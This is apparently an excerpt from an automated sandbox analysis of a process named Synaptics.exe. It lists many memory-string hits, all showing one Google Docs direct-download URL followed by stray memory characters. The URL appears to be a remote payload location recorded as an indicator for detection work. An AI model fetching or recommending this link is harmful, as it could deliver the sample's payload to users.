                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbP
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbd
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbert
                            Source: Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CHn
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcL
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck.c
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclie
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.cN
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.neX
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom0
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadconte
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctinn
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcurit
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddJ
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddroid
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds.cn
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds.cnc
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddyu
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeQ/%)
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeapi
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeappl1
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadearc
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadect-
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemQ
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo$
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadentOn
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadent_C
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeqo&-
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderse
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadert
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlens
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000710F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf-8
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfe
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfefra
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg.co
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg:
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgine..1
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-an
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.c31
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoogl8
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgvt1
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg~
                            Source: Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                            Source: Synaptics.exe, 0000001A.00000002.2350037760.000000001E43E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhn
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadht.cns
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-cn.net
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.000000000060A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiR
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadidevt
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadient
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadine.c
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadine.ch
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion-
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiss$
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadit
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadits#T
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity-P
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiveUZ
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyorD
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjQ4%
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadject
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk2
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkO
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkOjj2&a$
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkT17
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadke
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadktop
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkzm
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883242733.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.0000000007099000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D0C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2345426318.000000001C6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl:
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlatfo
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadld.
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlecli
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlesan
